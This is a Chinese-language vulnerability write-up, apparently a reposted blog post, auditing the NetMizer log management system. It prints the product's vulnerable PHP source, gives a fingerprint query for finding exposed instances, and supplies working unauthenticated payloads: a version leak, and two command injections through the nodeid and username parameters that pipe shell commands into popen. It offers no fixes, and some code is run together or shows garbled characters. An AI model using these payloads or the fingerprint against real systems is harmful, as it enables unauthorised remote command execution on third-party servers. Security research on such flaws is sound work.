0x00 前言
title="NetMizer 日志管理系统"
![某日志管理系统审计]( "某日志管理系统审计")
title="NetMizer 日志管理系统"
0x01 前台信息泄露
/data/config/upload.php 泄露了版本号.
include('../include/JSON.php');$conn_id = mysql_connect($dsn,$dbuser,$dbpasswd);mysql_select_db("sysmonitor");$versionfile ='/var/www/html/logserver/web.ver';$flagfile ='/tmp/upgradeflag';functioncheckpw($username, $password){$sqlstr ="SELECT password FROM tbl_admin WHERE username='".$username."'";$res = mysql_query($sqlstr);if($res){if(mysql_fetch_row($res)){$pwd = mysql_result($res,0,"password");if($password!="") $password = crypt($password,"poseidon");if($pwd == $password){mysql_close($conn_id);return0;}}}return-1;}if($action =='upload'){$passwd = mb_check_encoding($passwd,'UTF-8') ? mb_convert_encoding($passwd,'gbk','UTF-8') : $passwd;if(checkpw('admin',$passwd)<0) {echo'{"success":true, "info":"password error"}';return;}$file = $_FILES["userfile"]["tmp_name"];$file_name = $_FILES["userfile"]["name"];$tmp_filename ="/tmp/".$file_name;$result = move_uploaded_file($file, $tmp_filename);if($result){echo"{'success':true,'info':''}";}else{$errstr ="�����ļ��ϴ�ʧ�ܣ��������ϴ���";echo"{'success':true,'info':'$errstr'}";return;}chdir("/");$fp = @fopen('/tmp/webupdate.tmp',"w");@fwrite($fp, $file_name);@fclose($fp);system("mv /tmp/webupdate.tmp $flagfile");return;}elseif($action =='getversion'){$lines=@file($versionfile);$version ="20090101";if(isset($lines) &&isset($lines[0]) && $lines[0]!="") $version = trim($lines[0]);$str =array("success"=>true,"datas"=>$version);$json = json_encode($str);echo$json;return;}
Payload:/data/config/upload.php?action=getversion
0x02 前台任意命令执行
/data/search/position.php
<?phpinclude('../include/JSON.php');$cmd ="/var/www/cgi-bin/search_qq";if(!$starttime){$stop_time = floor(time()/300)*300;$stop_time =1471338000+3600;$start_time = $stoptime -600;}else{list($year,$month,$day,$hour,$min,$second)=split(":| |-", urldecode($starttime));$start_time = mktime($hour, $min, $second, $month,$day,$year);$cmd .=" -s $start_time";list($year,$month,$day,$hour,$min,$second)=split(":| |-", urldecode($stoptime));$stop_time = mktime($hour, $min, $second, $month,$day,$year);$cmd .=" -e $stop_time";}if($nodeid !=""){$sql_nodeid =" and nodeid = ".ip2long($nodeid)." ";$cmd .=" -n $nodeid";}else$sql_nodeid ="";$srcip = $src;if($srcip ==""){$srcid ="-1";}else$srcid = ip2long($srcip);if($srcid !="-1"){$sql_srcid =" and srcip = $srcid ";$cmd .=" -S $srcid";}else{$sql_srcid ="";}if($action =='file'){//echo$cmd."n";$fp = @popen($cmd,"r");if(!$fp){echo'{"success":true,"info":"no data"}';return;}
当 action=file时 nodeid若不为空 会插入到$cmd变量里 并传入到下方的@popen($cmd,"r");造成命令执行.
Payload:/data/search/position.php?action=file&nodeid=|id>1.txt
0x03 前台任意命令执行2
if($action=='list'){ //doby cif(!$nodeid){$devices= array();$cmd="ls$logpath";exec($cmd,$devices);for($i= 0;$i< count($devices);$i++){if(!ip2long($devices[$i]))continue;;if(!$nodeid){$nodeid=$devices[$i];break;}}}$stop=$start+$limit;//cgi -i 3232235877-3232235877 -a 1444974920 -s 0 -e 400$cmd="$cgi-q 1 -s$start-e$stop-n$nodeid";$cmd.="-a$start_time-b$stop_time";if(isset($iplist) &&$iplist!=""){$iplists= explode("-",$iplist);$ipstart= ip2long($iplists[0]);if(isset($iplists[1]))$ipstop= ip2long($iplists[1]);else$ipstop=$ipstart;$cmd.="-i$ipstart-$ipstop";}if(isset($username) &&$username!="")$cmd.="-u$username";if(isset($sorttype))$cmd.="-c$sorttype";//echo"$cmdn";$fp=@popen($cmd,"r");
Payload:/data/hostdelay/hostdelay.php?action=list&username=|ps>1.txt
原文始发于微信公众号(星悦安全):某日志管理系统审计
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论